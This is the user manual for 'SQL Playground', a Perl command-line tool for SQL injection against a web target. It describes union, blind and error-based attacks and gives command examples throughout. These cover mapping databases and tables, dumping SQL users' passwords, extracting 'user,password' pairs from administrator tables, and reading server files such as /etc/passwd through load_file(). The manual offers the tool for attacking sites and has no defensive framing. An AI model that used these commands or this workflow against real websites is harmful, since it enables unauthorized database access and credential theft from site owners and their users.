SQL Playground MANUAL

Program: SQL Playground [sp]
Version: 2.0
Credits: Charles "real" F. <charlesfol[at]hotmail.fr>
Please mail me if you modify this program or redistribute it.

sp is a perl tool to perform sql injection very easily and fast.
It permit many attack vectors (blind, union, error based).
sp uses dichotomy to perform blind SQL injections.

Target definition

sp> target <URL>

sp will try to get an ERROR message to determine the DATABASE TYPE and a MATCH message to use BLIND SQL Injections.

Informations

sp> info [custom]

custom: what type of information you want to show

VALUEINFO
TTarget
P/pParameters
D/dDatabases
tTables
C/cColumns
Q/qQueries
sp> infoTp    // Print informations about target and parameters

Param value assignment

sp> set <param> <value>

Set <param> value to <value>.

sp> set MATCH <b>Title</b>    // Set MATCH value to <b>Title</b>

Save/Load

sp> save [logfile] sp> load <logfile>

Using save without arguments will save data to the last loaded file.
Logfiles are created in the ./data/ directory and their extension is ".xml"
It will save target url, arg, match & error, union params (shown and fields), and other parameters.

Charset

sp> charset <all|num|md5|alpha|alphanum|custom>

Set the charset for blind attacks.

VALUECHARSET
alletaonisrhldcumfpwgbyvkxjqz0123456789_-\$.^()[]{}¦*\"'@=/\|#?+&!`<>:;,\
num0123456789
md5abcdef0123456789
alphaetaonisrhldcumfpwgbyvkxjqz
alphanumetaonisrhldcumfpwgbyvkxjqz0123456789
anything elsewhat you want
sp> charset abc012    // Set charset to "abc012" [customised value]

UNION Configuration

sp> union-conf

If you wanna use UNION stuffs, you have to configure it first using this.This will set FIELDS and SHOWN values, which are necessary for UNION or MUNION attack.
You can view it with "infop" or set it yourself using "set".

SQL Mapping

sp> union-map <dbs|tables|columns> [from <table|db>] sp> munion-map <dbs|tables|columns> [from <table|db>] sp> blind-map <dbs|tables|columns> [from <table|db>] sp> guess-map <tables|columns> [from <table>]

As you can see, there are 4 ways to map SQL.
UNION will use UNION.
MUNION will use UNION too, but is useful when just 1 SQL row is printed on the page.
BLIND will use a SQL Blind Injection.
GUESS will try to guess tables or columns using a dictionary.

Everything that is found is added to a specific list that you can see using "info"
Here are many exemples with explanations.

sp> union-map dbs    // This will list all databases sp> blind-map dbs    // This will list all databases sp> union-map tables from database03    // This will list tables from database "database03" sp> blind-map columns from db03.admins    // This will list tables from table "admins", which is on database "db03" sp> guess-map columns from news    // This will guess columns from table "news" sp> munion-map columns from news    // This will list tables from table "news"

Database Dump

sp> dump-map [custom]

custom: what type of information you want to dump (by default, dump everything)

VALUEINFO
DDatabases
TTables
CColumns

SQL Credentials

sp> union-cred sp> blind-cred

This will list SQL users and their password.

SQL Files

sp> union-file-get <file> sp> blind-file-get <file> [start]

Try to get <file> content using SQL "load_file()".

sp> blind-file-search <file> <string>

Try to find <string> into <file> using SQL "load_file()".

sp> guess-files

Try to find interesting files.

sp> blind-file-get /etc/passwd 193 // Get /etc/password content, starting at char n°193 sp> blind-file-search /etc/passwd admin // Find word "admin" in /etc/passwd file

SQL Basic Queries

sp> union <query> sp> munion <query> sp> blind <query> sp> mblind <query>

As you can see, there are 4 ways to map SQL.
UNION will use UNION.
MUNION will use UNION too, but is useful when just 1 SQL row is printed on the page.
BLIND will use a SQL Blind Injection.
MBLIND will use a SQL Blind Injection, but this will print all rows.

If only 1 row is found, results are saved into QUERIES ("infoq" to see them)
Here are many exemples with explanations.

sp> blind version() // Note: version() will return 1 row only, so it will be saved into QUERIES. sp> mblind SELECT user,password FROM administrators // This will dump every couple of "user,password" of table administrators sp> union SELECT user,password FROM administrators // This will dump every couple of "user,password" of table administrators sp> munion SELECT user,password FROM administrators // Same, but works even if only 1 row is printed

Proxy

sp> proxy <proxy>:<port> sp> proxy disable

Enable or disable HTTP proxy.

Notes

"reinit" reinitializes everything.